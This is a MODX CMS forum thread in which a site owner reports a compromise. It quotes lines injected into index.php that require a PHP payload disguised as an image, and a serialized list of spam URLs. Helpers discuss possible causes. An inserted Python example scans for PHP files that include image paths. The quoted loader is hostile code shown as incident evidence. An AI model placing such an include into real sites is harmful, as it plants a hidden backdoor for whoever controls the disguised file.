    • 13135
    • 30 Posts
    Have had 2 new 2.6.5 sites hacked.

    New folder in root /sitemaps with a tonne of fake xml sitemaps, plus code injected into index.php:
    //installbg
    $rifilename='/var/www/vhosts/<DOMAIN>/httpdocs/content/img/footer-bgs.png';
    require("$rifilename");
    //installend


    This "image" had a load of code in it (can post if wanted), and came along with 2 other similarly named images, one of which appeared to be a template, and the other contained:

    a:20:{s:1:"/";s:6:"301480";s:12:"/favicon.ico";s:4:"5837";s:6:"/faqs/";s:6:"130846";s:17:"/solutions/floors";s:6:"251218";s:16:"/tel:08006891054";s:5:"13134";s:6:"/about";s:6:"378664";s:8:"/contact";s:6:"536125";s:34:"/mailto:<MY DOMAINS EMAI ADDRESS>";s:6:"162439";s:18:"/dzptyjaluptn.html";s:6:"268369";s:10:"/quotation";s:6:"207385";s:16:"/types-of-noise/";s:6:"394376";s:19:"/solutions/ceilings";s:6:"274574";s:16:"/solutions/walls";s:6:"117594";s:16:"/mibiovgznb.html";s:6:"347468";s:18:"/solutions/studios";s:6:"260624";s:10:"/solutions";s:6:"222152";s:18:"/solutions/bespoke";s:6:"287381";s:11:"/solutions/";s:6:"350582";s:14:"/ipdhthvu.html";s:6:"623653";s:23:"/?cachebuster=841958990";s:6:"131312";}


    Cleaned and upgraded to 2.7.0, but is this a new exploit with 2.6.5?
    Thanks
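
An added example, not part of the original thread and not MODX code: a Python check for the two signs described in the post above, a PHP file that passes an image path to `require`/`include` (directly or through a variable, as in the quoted `index.php` snippet) and an image file that contains a PHP open tag. The function names, the extension list and the sample input are assumptions made for illustration.

```python
import re
from pathlib import Path

IMG_EXT = r"(?:png|jpe?g|gif|ico|bmp|webp)"
# $var = '/some/path.png'  (the injected code hides the path in a variable)
ASSIGN = re.compile(r"\$(\w+)\s*=\s*(['\"])([^'\"]+\." + IMG_EXT + r")\2", re.I)
# require / include / *_once, capturing the argument up to the semicolon
INCLUDE = re.compile(r"\b(?:require|include)(?:_once)?\b\s*\(?([^;]*);", re.I)
LITERAL_IMG = re.compile(r"['\"]([^'\"]+\." + IMG_EXT + r")['\"]", re.I)
PHP_TAG = re.compile(rb"<\?php", re.I)

# Constructed sample modelled on the snippet quoted in the post above.
SAMPLE_INDEX = """<?php
//installbg
$rifilename='/var/www/vhosts/<DOMAIN>/httpdocs/content/img/footer-bgs.png';
require("$rifilename");
//installend
require_once dirname(__FILE__) . '/config.core.php';
"""

def includes_of_images(php_source):
    """Return image paths that the PHP source passes to require/include."""
    img_vars = {m.group(1): m.group(3) for m in ASSIGN.finditer(php_source)}
    hits = []
    for inc in INCLUDE.finditer(php_source):
        arg = inc.group(1)
        hits += LITERAL_IMG.findall(arg)            # require 'x.png';
        hits += [path for var, path in img_vars.items()
                 if re.search(r"\$" + re.escape(var) + r"\b", arg)]  # require $v;
    return hits

def image_contains_php(data):
    """True if the bytes of a supposed image carry a PHP open tag."""
    return PHP_TAG.search(data) is not None

def scan(webroot):
    """Return ({php_file: [included image paths]}, [images holding PHP])."""
    bad_includes, bad_images = {}, []
    for p in sorted(q for q in Path(webroot).rglob("*") if q.is_file()):
        ext = p.suffix.lower().lstrip(".")
        if ext == "php":
            hits = includes_of_images(p.read_text(errors="replace"))
            if hits:
                bad_includes[str(p)] = hits
        elif re.fullmatch(IMG_EXT, ext) and image_contains_php(p.read_bytes()):
            bad_images.append(str(p))
    return bad_includes, bad_images
```

Calling `scan()` on the site's document root returns both lists. It only matches the literal `<?php` tag, so it is a complement to file-integrity checks rather than a replacement.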
      • 3749
      • 24,544 Posts
      When you say "new" do you mean that you installed MODX to a completely empty directory and created a new, empty database in each case?

      Had sites of yours on that server been hacked?
        Did I help you? Buy me a beer
        Get my Book: MODX:The Official Guide
        MODX info for everyone: http://bobsguides.com/modx.html
        My MODX Extras
        Bob's Guides is now hosted at A2 MODX Hosting
        • 13135
        • 30 Posts
        Both installed in a dev environment on 2.5.7 but upgraded to 2.6.5 (while still in dev) and then both sites have since launched. Just had a google notification about the sitemaps on one and noticed they've both been hacked the same way.

        Yes, had one site (2.5.7) on the same server get hacked, cleaned, upgraded to 2.6.5, all passwords changed etc. That site is fine atm.
          • 3749
          • 24,544 Posts
          Is it possible that your dev environment was reachable via the internet?

          Also, did you have the Gallery extra installed and was it updated before you launched the production sites?
            • 13135
            • 30 Posts
            The production environment was accessible. But both sites were clean, I have checks that would have picked up any file changes when launched.
            I'm beginning to think the server may be compromised in some way.

            Gallery Extra was not installed on either.